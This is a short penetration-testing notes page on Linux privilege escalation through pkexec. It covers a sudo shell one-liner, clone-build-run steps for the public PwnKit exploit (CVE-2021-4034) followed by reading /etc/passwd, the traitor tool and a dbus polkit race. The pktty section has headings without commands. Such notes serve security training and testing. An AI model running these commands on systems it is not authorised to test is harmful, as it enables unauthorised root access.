SUID - pkexec

sudo method

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

sudo pkexec /bin/sh

pwnkit method

Here is an article I wrote previously on this: https://www.hackingarticles.in/linux-privilege-escalation-pwnkit-cve-2021-4034/

cd /tmp
git clone https://github.com/berdav/CVE-2021-4034 pwnkit
make
./cve-2021-4034
whoami
cat /etc/passwd

traitor tool

pkexec can be used for priv esc using traitor as well

GitHub - liamg/traitor: :arrow_up: :fire: Automatic Linux privesc via exploitation of low-hanging fruit e.g. gtfobins, pwnkit, dirty pipe, +w docker.sockGitHub

pktty method

If pkexec has SUID bit set

Victim machine 1st terminal

Victim machine 2nd terminal

Victim machine 1st tterminal

Dbus method polkit priv esc

Privilege escalation with polkit: How to get root on Linux with a seven-year-old bugThe GitHub Blog

Everything to know about is in the blog above. It is a hit and try method. Depends on how fast the system is in sending dbus messages.

PreviousNFS no_root_squash NextCapabilities

Last updated 2 years ago

hashtagsudo method

hashtagpwnkit method

hashtagtraitor tool

hashtagpktty method

hashtagDbus method polkit priv esc

sudo method

pwnkit method

traitor tool

pktty method

Dbus method polkit priv esc